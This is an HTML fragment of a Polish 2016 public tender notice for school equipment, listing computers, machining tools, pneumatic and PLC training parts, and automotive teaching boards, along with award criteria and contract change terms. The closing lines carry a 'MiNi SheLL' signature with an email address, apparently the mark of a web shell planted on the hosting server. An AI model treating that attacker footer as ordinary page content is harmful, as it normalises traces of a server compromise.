                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>najniższa cena </td><td>60</td></tr><tr><td>termin płatności wynagrodzenia wykonawcy</td><td>10</td></tr><tr><td>okres gwarancji</td><td>10</td></tr><tr><td>termin realizacji zamówienia </td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zamawiający przewiduje możliwość zmiany umowy w następujących przypadkach, jeżeli:
a) nastąpi zmiana obowiązujących przepisów  w tym przypadku zamawiający będzie uprawniony do zmiany umowy tylko w tym zakresie, w jakim zmiana przepisów prawa wpływa na prawa i obowiązki stron umowy, w szczególności zmiana stawki podatku VAT w odniesieniu do wynagrodzenia (w takim przypadku nie może ulec zmianie wartość wynagrodzenia brutto);
b) nastąpią zmiany organizacyjne lub formy prawnej Stron, istotne dla realizacji umowy;
c) zaistnieje konieczność zrealizowania umowy przy zastosowaniu innych założeń niż zawartych w opisie przedmiotu zamówienia, gdyby zastosowanie przewidzianych dotychczas założeń groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy  w takim przypadku Wykonawca może wnieść o realizację zamówienia przy przyjęciu odmiennych założeń zapewniających jednak realizację celów zamówienia w stopniu nie mniejszym niż dotychczas założony;
d) wystąpią inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia działań w celu wykonania umowy, np. zmiany prawa;
2. Zamawiający przewiduje możliwość dokonania zmiany terminu realizacji umowy w następujących przypadkach jeżeli:
a) nastąpi zmiana obowiązujących przepisów  w tym przypadku Zamawiający będzie uprawniony do zmiany umowy tylko w tym zakresie, w jakim zmiana przepisów prawa wpływa na prawa i obowiązki stron umowy,
b) zaistnieje konieczność zrealizowania umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w opisie przedmiotu zamówienia, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy  w takim przypadku Wykonawca może wnieść o realizację zamówienia przy pomocy innych rozwiązań technicznych/technologicznych o równoważnych lub lepszych parametrach i przedłużenie terminu realizacji o czas niezbędny do zastosowania tych rozwiązań,
c) zaistnieją okoliczności Siły wyższej, to znaczy niezależnego od Stron losowego zdarzenia zewnętrznego, które było niemożliwe do przewidzenia w momencie zawarcia umowy i któremu nie można było zapobiec mimo dochowania należytej staranności.
3. Zmiany, o których mowa w punktach 2.1. i 2.2. winny być uzasadnione i udokumentowane. Wniosek dotyczący w/w zmian, wraz z uzasadnieniem, Strona występująca zobowiązana jest złożyć drugiej stronie najpóźniej na 7 dni przed końcem trwania umowy.
4. Okoliczności, wskazane w punkcie 2, mogą stanowić podstawę zmiany terminu wykonania zamówienia tylko wówczas, gdy uniemożliwiają terminowe wykonanie umowy.
5. Zamawiający nie dopuszcza zmiany terminu wykonania zamówienia w przypadkach zawinionych przez Wykonawcę.
6. W przypadku wystąpienia okoliczności uzasadniających zmianę terminu wykonania umowy, może on ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
7. Wszystkie powyższe okoliczności stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
8. Wykonawca składając ofertę oświadcza na formularzu oferty, że akceptuje postanowienia umowy.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 29/09/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Sprzęt komputerowy i multimedialny<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem dostawy jest:
1) projektor multimedialny  szt. 1,
2) drukarka atramentowa A3 ze skanerem  szt. 1,
3) drukarka laserowa A4 ze skanerem i kopiarką  szt. 2,
4) tablica mobilna fipchart  szt. 2,
5) laptop przystosowany do współpracy ze sterownikami  szt. 8,
6) monitor  szt. 3,
7) drukarka laserowa sieciowa A4 ze skanerem i kopiarką  szt. 1.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30236000-2, 38652100-1,
                    30213100-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>najniższa cena</td><td>60</td></tr><tr><td>termin płatności wynagrodzenia wykonawcy</td><td>10</td></tr><tr><td>okres gwarancji</td><td>10</td></tr><tr><td>termin realizacji zamówienia </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Narzędzia, przyrządy i materiały mechaniczne<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem dostawy jest:
1) głębokościomierz mikrometryczny  szt. 8,
2) płytki wzorcowe klasa 2  szt. 3,
3) czujnik krawędziowy  szt. 1,
4) czujnik krawędziowy 2D ze wskaźnikiem świetlnym  szt. 1,
5) czujnik krawędziowy 3D ze wskaźnikiem świetlnym  szt. 1,
6) czujnik wysokości narzędzi i materiału CNC  szt. 1,
7) komplet średnicówek mikrometrycznych trójpunktowych  szt. 2, 
8) uchwyt tokarski 3-szczękowy 80 mm  szt. 1,
9) uchwyt tokarski 3-szczękowy 125 mm  szt. 3,
10) praska montażowa ręczna  szt. 3,
11) imadło maszynowe 125 mm  szt. 2,
12) wiertarka stołowa  szt. 2,
13) frez do rowków fi3  szt. 14,
14) frez do rowków fi4  szt. 14,
15) frez do rowków fi5  szt. 10,
16) frez do rowków fi6  szt. 10,
17) frez do rowków fi7  szt. 10,
18) frez do rowków fi8  szt. 8,
19) frez do rowków fi10  szt. 8,
20) frez do rowków fi12  szt. 8,
21) frez do rowków fi14  szt. 8,
22) wiertło fi3  szt. 20,
23) wiertło fi4  szt. 20,
24) wiertło fi5  szt. 20,
25) wiertło fi6  szt. 20,
26) wiertło fi7  szt. 10,
27) wiertło fi8  szt. 10,
28) wiertło fi10  szt. 10,
29) frez walcowo-czołowy nasadzany  szt. 7,
30) frez składany trzpieniowy 2-ostrzowy walcowo-czołowy wraz z kompletem płytek skrawających  szt. 8,
31) nóż tokarski składany do toczenia wewnętrznego  szt. 10,
32) płytka do toczenia CCMT 060204  szt. 30,
33) oprawka narzędziowa  szt. 10,
34) płytka do toczenia DCMT 11T304  szt. 10,
35) oprawka narzędziowa  szt. 10,
36) płytka do toczenia CCMT 09T304  szt. 10,
37) oprawka narzędziowa  szt. 10,
38) płytka do toczenia VCMT 110304  szt. 10,
39) oprawka narzędziowa  szt. 10,
40) oprawka narzędziowa  szt. 10,
41) płytka do toczenia DCMT 070204  szt. 20.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>38410000-2, 44510000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>najniższa cena</td><td>60</td></tr><tr><td>termin płatności wynagrodzenia wykonawcy</td><td>10</td></tr><tr><td>okres gwarancji</td><td>10</td></tr><tr><td>termin realizacji zamówienia </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Narzędzia, przyrządy i materiały elektryczne<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem dostawy jest:
1) sprężarka  szt. 1,
2) stycznik cewka na napięcie  szt. 6,
3) przekaźnik elektryczny  szt. 6,
4) przekaźnik elektryczny czasowy - załącz po czasie  szt. 12,
5) przekaźnik elektryczny czasowy - wyłącz po czasie  szt. 12,
6) czujnik indukcyjny (styk NO)  szt. 12,
7) czujnik pojemnościowy (styk NO)  szt. 12,
8) czujnik fotoelektryczny refleksyjny (styk NO)  szt. 12,
9) czujnik fotoelektryczny odbiciowy (styk NO)  szt. 6,
10) magnetyczny czujnik krańcowy montowany na siłowniku (styk NO)  szt. 24, 
11) pneumoelektryczny czujnik ciśnienia ze stykiem NO  szt. 6,
12) przycisk sterowniczy monostabilny (styk NO)  szt. 12,
13) przycisk sterowniczy monostabilny (styk NC)  szt. 12,
14) przycisk sterowniczy bistabilny (styk NO)  szt. 12,
15) przycisk sterowniczy bistabilny (styk NC)  szt. 12,
16) łącznik krańcowy z rolką elektryczny (styk NO i NC)  szt. 24,
17) lampka sygnalizacyjna zielona 24V DC  szt. 12,
18) lampka sygnalizacyjna czerwona 24V DC  szt. 12,
19) lampka sygnalizacyjna żółta 24V DC  szt. 12,
20) zespół przygotowania powietrza  szt. 6,
21) siłownik pneumatyczny dwustronnego działania bezsmarowy z magnetycznym tłokiem  szt. 12,
22) siłownik pneumatyczny jednostronnego działania bezsmarowy ze sprężyną 32x50 z zaworem dławiąco zwrotnym G1/8-6  szt. 12,
23) zawór pneumatyczny 3/2 monostabilny, sterownie ręczne ze sprężyną zwrotną NO  szt. 6,
24) zawór pneumatyczny 3/2 monostabilny, sterownie ręczne ze sprężyną zwrotną NC  szt. 6,
25) zawór pneumatyczny 3/2 bistabilny, sterowanie pneumatyczne  szt. 6,
26) zawór pneumatyczny 3/2 monostabilny, sterowanie pneumatyczne NO  szt. 6,
27) zawór pneumatyczny 3/2 monostabilny, sterowanie pneumatyczne NC  szt. 6,
28) zawór pneumatyczny 3/2 monostabilny, sterowanie cewka 24 V DC NC  szt. 6,
29) zawór pneumatyczny 3/2 monostabilny, sterowanie cewka 24 V DC NO  szt. 6,
30) zawór pneumatyczny 5/2 bistabilny, sterowanie pneumatyczne  szt. 12,
31) zawór pneumatyczny 5/2 momostabilny, sterowanie pneumatyczne  szt. 12,
32) zawór pneumatyczny 5/2 momostabilny, sterowanie ręczne przyciskiem  szt. 6,
33) elektrozawór pneumatyczny 5/2 bistabilny, sterowany dwoma cewkami 24 V DC  szt. 12,
34) elektrozawór pneumatyczny 5/2 monostabilny, sterowany cewką 24 V DC  szt. 6,
35) łącznik krańcowy pneumatyczny (styk NO)  szt. 12,
36) łącznik krańcowy pneumatyczny (styk NC)  szt. 12,
37) blok rozdzielający  szt. 12,
38) zawór zwrotno-dławiący  szt. 18,
39) zawór szybkiego spustu  szt. 6,
40) zawór bezpieczeństwa  szt. 6,
41) zawór redukcyjny  szt. 6,
42) zawór zwrotny  szt. 6,
43) zawór odcinający powietrza  szt. 6,
44) zawór czasowy (styk NO)  szt. 6,
45) zawór czasowy (styk NC)  szt. 6,
46) zawór logiczny AND  szt. 12,
47) zawór logiczny OR  szt. 12,
48) komplet narzędzi monterskich  szt. 6,
49) próbnik napięcia  szt. 6,
50) sterownik szkolny Logo 8 Siemens lub równoważny typu 12/24RCE spełniający podane w tabeli parametry  szt. 6,
51) moduł rozszerzeń kompatybilny z zestawem sterowników typu Logo 8 lub 12/24 RCE  szt. 6,
52) sterownik przemysłowy S7-1200 produkcji Siemens lub równoważny  szt. 6,
53) gniazdo banankowe czarne  szt. 300,
54) gniazdo banankowe czerwone  szt. 300,
55) zestaw profili aluminiowych do budowy stanowiska PLC  kpl. 12,
56) przełącznik dźwigniowy mono i bistbilny (zadajnik sygnałów na sterownik PLC)  szt. 120.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>31681000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>najniższa cena</td><td>60</td></tr><tr><td>termin płatności wynagrodzenia wykonawcy</td><td>10</td></tr><tr><td>okres gwarancji</td><td>10</td></tr><tr><td>termin realizacji zamówienia </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Tablice dydaktyczne<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem dostawy jest:

1) system sterowania silnikiem ZS typu Common Rail  szt. 1,
2) elementy układów elektrycznych pojazdów  szt. 1,
3) tester diagnostyczny  szt. 1. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>31681000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>najniższa cena</td><td>60</td></tr><tr><td>termin płatności wynagrodzenia wykonawcy</td><td>10</td></tr><tr><td>okres gwarancji</td><td>10</td></tr><tr><td>termin realizacji zamówienia </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com